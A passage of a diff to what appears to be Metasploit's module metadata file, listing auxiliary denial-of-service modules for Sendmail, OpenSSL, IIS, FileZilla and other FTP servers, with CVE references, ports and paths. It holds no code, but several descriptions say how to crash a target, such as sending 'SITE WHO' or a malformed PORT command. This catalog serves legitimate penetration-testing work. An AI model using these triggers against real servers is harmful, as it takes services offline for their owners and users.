"auxiliary/dos/smtp/sendmail_prescan", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-09-17", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This is a proof of concept denial of service module for Sendmail versions\n 8.12.8 and earlier. The vulnerability is within the prescan() method when\n parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00\n bytes can be used, limiting the likelihood for arbitrary code execution.", + "references": [ + "OSVDB-2577", + "CVE-2003-0694", + "BID-8641", + "EDB-24" + ], + "platform": "", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": null, + "mod_time": "2023-01-04 14:45:58 +0000", + "path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb", + "is_install_path": true, + "ref_name": "dos/smtp/sendmail_prescan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/solaris/lpd/cascade_delete": { + "name": "Solaris LPD Arbitrary File Delete", + "fullname": "auxiliary/dos/solaris/lpd/cascade_delete", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm ", + "Optyx " + ], + "description": "This module uses a vulnerability in the Solaris line printer\n daemon to delete arbitrary files on an affected system. This\n can be used to exploit the rpc.walld format string flaw, the\n missing krb5.conf authentication bypass, or simply delete\n system files. Tested on Solaris 2.6, 7, 8, 9, and 10.", + "references": [ + "CVE-2005-4797", + "BID-14510", + "OSVDB-18650" + ], + "platform": "", + "arch": "", + "rport": 515, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb", + "is_install_path": true, + "ref_name": "dos/solaris/lpd/cascade_delete", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ssl/dtls_changecipherspec": { + "name": "OpenSSL DTLS ChangeCipherSpec Remote DoS", + "fullname": "auxiliary/dos/ssl/dtls_changecipherspec", + "aliases": [], + "rank": 300, + "disclosure_date": "2000-04-26", + "type": "auxiliary", + "author": [ + "Jon Oberheide ", + "theLightCosine " + ], + "description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL\n version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a\n ChangeCipherspec Datagram before a ClientHello.", + "references": [ + "CVE-2009-1386", + "OSVDB-55073" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb", + "is_install_path": true, + "ref_name": "dos/ssl/dtls_changecipherspec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ssl/dtls_fragment_overflow": { + "name": "OpenSSL DTLS Fragment Buffer Overflow DoS", + "fullname": "auxiliary/dos/ssl/dtls_fragment_overflow", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-06-05", + "type": "auxiliary", + "author": [ + "Juri Aedla ", + "Jon Hart " + ], + "description": "This module performs a Denial of Service Attack against Datagram TLS in\n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.\n This occurs when a DTLS ClientHello message has multiple fragments and the\n fragment lengths of later fragments are larger than that of the first, a\n buffer overflow occurs, causing a DoS.", + "references": [ + "CVE-2014-0195", + "ZDI-14-173", + "BID-67900", + "URL-http://web.archive.org/web/20150815024234/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002", + "URL-http://web.archive.org/web/20140707160621/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048" + ], + "platform": "", + "arch": "", + "rport": 4433, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb", + "is_install_path": true, + "ref_name": "dos/ssl/dtls_fragment_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ssl/openssl_aesni": { + "name": "OpenSSL TLS 1.1 and 1.2 AES-NI DoS", + "fullname": "auxiliary/dos/ssl/openssl_aesni", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-02-05", + "type": "auxiliary", + "author": [ + "Wolfgang Ettlinger " + ], + "description": "The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the\n length of an encrypted message when used with a TLS version 1.1 or above. This\n leads to an integer underflow which can cause a DoS. The vulnerable function\n aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.\n This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default\n OpenSSL 1.0.1c package.", + "references": [ + "CVE-2012-2686", + "URL-https://www.openssl.org/news/secadv/20130205.txt" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/ssl/openssl_aesni.rb", + "is_install_path": true, + "ref_name": "dos/ssl/openssl_aesni", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/syslog/rsyslog_long_tag": { + "name": "rsyslog Long Tag Off-By-Two DoS", + "fullname": "auxiliary/dos/syslog/rsyslog_long_tag", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-01", + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers an off-by-two overflow in the\n rsyslog daemon. This flaw is unlikely to yield code execution\n but is effective at shutting down a remote log daemon. This bug\n was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.\n Compiler differences may prevent this bug from causing any\n noticeable result on many systems (RHEL6 is affected).", + "references": [ + "CVE-2011-3200", + "URL-https://www.rsyslog.com/potential-dos-with-malformed-tag/", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=727644" + ], + "platform": "", + "arch": "", + "rport": 514, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb", + "is_install_path": true, + "ref_name": "dos/syslog/rsyslog_long_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/tcp/claymore_dos": { + "name": "Claymore Dual GPU Miner Format String dos attack", + "fullname": "auxiliary/dos/tcp/claymore_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-02-06", + "type": "auxiliary", + "author": [ + "res1n", + "bluebird" + ], + "description": "Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.", + "references": [ + "CVE-2018-6317", + "EDB-43972", + "URL-https://github.com/nanopool/Claymore-Dual-Miner" + ], + "platform": "", + "arch": "", + "rport": 3333, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-05-17 17:04:49 +0000", + "path": "/modules/auxiliary/dos/tcp/claymore_dos.py", + "is_install_path": true, + "ref_name": "dos/tcp/claymore_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/tcp/junos_tcp_opt": { + "name": "Juniper JunOS Malformed TCP Option", + "fullname": "auxiliary/dos/tcp/junos_tcp_opt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module exploits a denial of service vulnerability\n in Juniper Network's JunOS router operating system. By sending a TCP\n packet with TCP option 101 set, an attacker can cause an affected\n router to reboot.", + "references": [ + "BID-37670", + "OSVDB-61538", + "URL-http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/tcp/junos_tcp_opt.rb", + "is_install_path": true, + "ref_name": "dos/tcp/junos_tcp_opt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/tcp/synflood": { + "name": "TCP SYN Flooder", + "fullname": "auxiliary/dos/tcp/synflood", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "A simple TCP SYN flooder", + "references": [], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/tcp/synflood.rb", + "is_install_path": true, + "ref_name": "dos/tcp/synflood", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/upnp/miniupnpd_dos": { + "name": "MiniUPnPd 1.4 Denial of Service (DoS) Exploit", + "fullname": "auxiliary/dos/upnp/miniupnpd_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-27", + "type": "auxiliary", + "author": [ + "hdm ", + "Dejan Lukan" + ], + "description": "This module allows remote attackers to cause a denial of service (DoS)\n in MiniUPnP 1.0 server via a specifically crafted UDP request.", + "references": [ + "CVE-2013-0229", + "OSVDB-89625", + "BID-57607", + "URL-https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play/", + "URL-https://www.hdm.io/writing/SecurityFlawsUPnP.pdf" + ], + "platform": "", + "arch": "", + "rport": 1900, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-12-04 17:41:24 +0000", + "path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb", + "is_install_path": true, + "ref_name": "dos/upnp/miniupnpd_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/appian/appian_bpm": { + "name": "Appian Enterprise Business Suite 5.6 SP1 DoS", + "fullname": "auxiliary/dos/windows/appian/appian_bpm", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-12-17", + "type": "auxiliary", + "author": [ + "guiness.stout " + ], + "description": "This module exploits a denial of service flaw in the Appian\n Enterprise Business Suite service.", + "references": [ + "CVE-2007-6509", + "OSVDB-39500", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html" + ], + "platform": "", + "arch": "", + "rport": 5400, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/appian/appian_bpm.rb", + "is_install_path": true, + "ref_name": "dos/windows/appian/appian_bpm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/browser/ms09_065_eot_integer": { + "name": "Microsoft Windows EOT Font Table Directory Integer Overflow", + "fullname": "auxiliary/dos/windows/browser/ms09_065_eot_integer", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-11-10", + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module exploits an integer overflow flaw in the Microsoft Windows Embedded\n OpenType font parsing code located in win32k.sys. Since the kernel itself parses\n embedded web fonts, it is possible to trigger a BSoD from a normal web page when\n viewed with Internet Explorer.", + "references": [ + "CVE-2009-2514", + "MSB-MS09-065", + "OSVDB-59869" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb", + "is_install_path": true, + "ref_name": "dos/windows/browser/ms09_065_eot_integer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/windows/ftp/filezilla_admin_user": { + "name": "FileZilla FTP Server Admin Interface Denial of Service", + "fullname": "auxiliary/dos/windows/ftp/filezilla_admin_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-11-07", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server Administration Interface in versions 0.9.4d and earlier.\n By sending a procession of excessively long USER commands to the FTP\n Server, the Administration Interface (FileZilla Server Interface.exe)\n when running, will overwrite the stack with our string and generate an\n exception. The FileZilla FTP Server itself will continue functioning.", + "references": [ + "BID-15346", + "CVE-2005-3589", + "EDB-1336", + "OSVDB-20817" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/filezilla_admin_user", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/filezilla_server_port": { + "name": "FileZilla FTP Server Malformed PORT Denial of Service", + "fullname": "auxiliary/dos/windows/ftp/filezilla_server_port", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-12-11", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server versions 0.9.21 and earlier. By sending a malformed PORT command\n then LIST command, the server attempts to write to a NULL pointer.", + "references": [ + "BID-21542", + "BID-21549", + "CVE-2006-6565", + "EDB-2914", + "OSVDB-34435" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/filezilla_server_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/guildftp_cwdlist": { + "name": "Guild FTPd 0.999.8.11/0.999.14 Heap Corruption", + "fullname": "auxiliary/dos/windows/ftp/guildftp_cwdlist", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-12", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable\n to heap corruption. You need to have a valid login\n so you can run CWD and LIST.", + "references": [ + "CVE-2008-4572", + "OSVDB-49045", + "EDB-6738" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/guildftp_cwdlist", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/iis75_ftpd_iac_bof": { + "name": "Microsoft IIS FTP Server Encoded Response Overflow Trigger", + "fullname": "auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-12-21", + "type": "auxiliary", + "author": [ + "Matthew Bergin", + "jduck " + ], + "description": "This module triggers a heap overflow when processing a specially crafted\n FTP request containing Telnet IAC (0xff) bytes. When constructing the response,\n the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.\n\n This issue can be triggered pre-auth and may in fact be exploitable for\n remote code execution.", + "references": [ + "CVE-2010-3972", + "OSVDB-70167", + "BID-45542", + "MSB-MS11-004", + "EDB-15803", + "URL-https://msrc-blog.microsoft.com/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability/" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/iis_list_exhaustion": { + "name": "Microsoft IIS FTP Server LIST Stack Exhaustion", + "fullname": "auxiliary/dos/windows/ftp/iis_list_exhaustion", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-09-03", + "type": "auxiliary", + "author": [ + "Kingcope", + "Myo Soe" + ], + "description": "This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.", + "references": [ + "CVE-2009-2521", + "BID-36273", + "OSVDB-57753", + "MSB-MS09-053", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/iis_list_exhaustion", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/solarftp_user": { + "name": "Solar FTP Server Malformed USER Denial of Service", + "fullname": "auxiliary/dos/windows/ftp/solarftp_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-22", + "type": "auxiliary", + "author": [ + "x000 <3d3n@hotmail.com.br>", + "C4SS!0 G0M3S ", + "sinn3r " + ], + "description": "This module will send a format string as USER to Solar FTP, causing a\n READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n while trying to calculate the length of the string. This vulnerability\n affects versions 2.1.1 and earlier.", + "references": [ + "EDB-16204" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/solarftp_user", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/titan626_site": { + "name": "Titan FTP Server 6.26.630 SITE WHO DoS", + "fullname": "auxiliary/dos/windows/ftp/titan626_site", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-14", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The Titan FTP server v6.26 build 630 can be DoS'd by\n issuing \"SITE WHO\". You need a valid login so you\n can send this command.", + "references": [ + "CVE-2008-6082", + "OSVDB-49177", + "EDB-6753" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/titan626_site", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/vicftps50_list": { + "name": "Victory FTP Server 5.0 LIST DoS", + "fullname": "auxiliary/dos/windows/ftp/vicftps50_list", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-24", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The Victory FTP Server v5.0 can be brought down by sending\n a very simple LIST command", + "references": [ + "CVE-2008-2031", + "CVE-2008-6829", + "OSVDB-44608", + "EDB-6834" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/vicftps50_list", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/winftp230_nlst": { + "name": "WinFTP 2.3.0 NLST Denial of Service", + "fullname": "auxiliary/dos/windows/ftp/winftp230_nlst", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-09-26", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.", + "references": [ + "CVE-2008-5666", + "OSVDB-49043", + "EDB-6581" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/winftp230_nlst", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/xmeasy560_nlst": { + "name": "XM Easy Personal FTP Server 5.6.0 NLST DoS", + "fullname": "auxiliary/dos/windows/ftp/xmeasy560_nlst", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-13", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "This module is a port of shinnai's script. You need\n a valid login, but even anonymous can do it as long\n as it has permission to call NLST.", + "references": [ + "CVE-2008-5626", + "OSVDB-50837", + "EDB-6741" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/xmeasy560_nlst", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/xmeasy570_nlst": { + "name": "XM Easy Personal FTP Server 5.7.0 NLST DoS", + "fullname": "auxiliary/dos/windows/ftp/xmeasy570_nlst", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-03-27", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "You need a valid login to DoS this FTP server, but\n even anonymous can do it as long as it has permission\n to call NLST.", + "references": [ + "CVE-2008-5626", + "OSVDB-50837", + "EDB-8294" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/xmeasy570_nlst", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/games/kaillera": { + "name": "Kaillera 0.86 Server Denial of Service", + "fullname": "auxiliary/dos/windows/games/kaillera", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-07-02", + "type": "auxiliary", + "author": [ + "Sil3nt_Dre4m" + ], + "description": "The Kaillera 0.86 server can be shut down by sending any malformed packet\n after the initial \"hello\" packet.", + "references": [], + "platform": "", + "arch": "", + "rport": 27888, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/games/kaillera.rb", + "is_install_path": true, + "ref_name": "dos/windows/games/kaillera", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166": { + "name": "Windows IIS HTTP Protocol Stack DOS", + "fullname": "auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-05-11", + "type": "auxiliary", + "author": [ + "Max", + "Stefan Blair", + "Axel Souchet", + "Maurice LAMBERT " + ], + "description": "This module exploits CVE-2021-31166, a UAF bug in http.sys\n when parsing specially crafted Accept-Encoding headers\n that was patched by Microsoft in May 2021, on vulnerable\n IIS servers. Successful exploitation will result in\n the target computer BSOD'ing before subsequently rebooting.\n Note that the target IIS server may or may not come back up,\n this depends on the target's settings as to whether IIS\n is configured to start on reboot.", + "references": [ + "CVE-2021-31166", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2021-31166", + "URL-https://github.com/mauricelambert/CVE-2021-31166", + "URL-https://twitter.com/metr0/status/1392631376592076805", + "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-01 17:54:59 +0000", + "path": "/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb", + "is_install_path": true, + "ref_name": "dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/http/ms10_065_ii6_asp_dos": { + "name": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service", + "fullname": "auxiliary/dos/windows/http/ms10_065_ii6_asp_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-09-14", + "type": "auxiliary", + "author": [ + "Heyder Andrade ", + "Leandro Oliveira " + ], + "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.", + "references": [ + "CVE-2010-1899", + "OSVDB-67978", + "MSB-MS10-065", + "EDB-15167" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb", + "is_install_path": true, + "ref_name": "dos/windows/http/ms10_065_ii6_asp_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/http/pi3web_isapi": { + "name": "Pi3Web ISAPI DoS", + "fullname": "auxiliary/dos/windows/http/pi3web_isapi", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-11-13", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The Pi3Web HTTP server crashes when a request is made for an invalid DLL\n file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs\n in this directory after installation are users.txt, install.daf and\n readme.daf.", + "references": [ + "CVE-2008-6938", + "OSVDB-49998", + "EDB-7109" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/http/pi3web_isapi.rb", + "is_install_path": true, + "ref_name": "dos/windows/http/pi3web_isapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/llmnr/ms11_030_dnsapi": { + "name": "Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS", + "fullname": "auxiliary/dos/windows/llmnr/ms11_030_dnsapi", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-04-12", + "type": "auxiliary", + "author": [ + "jduck " + ], + "description": "This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll\n as distributed with Windows Vista and later without KB2509553. By sending a\n specially crafted LLMNR query, containing a leading '.' character, an attacker\n can trigger stack exhaustion or potentially cause stack memory corruption.\n\n Although this vulnerability may lead to code execution, it has not been proven\n to be possible at the time of this writing.\n\n NOTE: In some circumstances, a '.' may be found before the top of the stack is\n reached. In these cases, this module may not be able to cause a crash.", + "references": 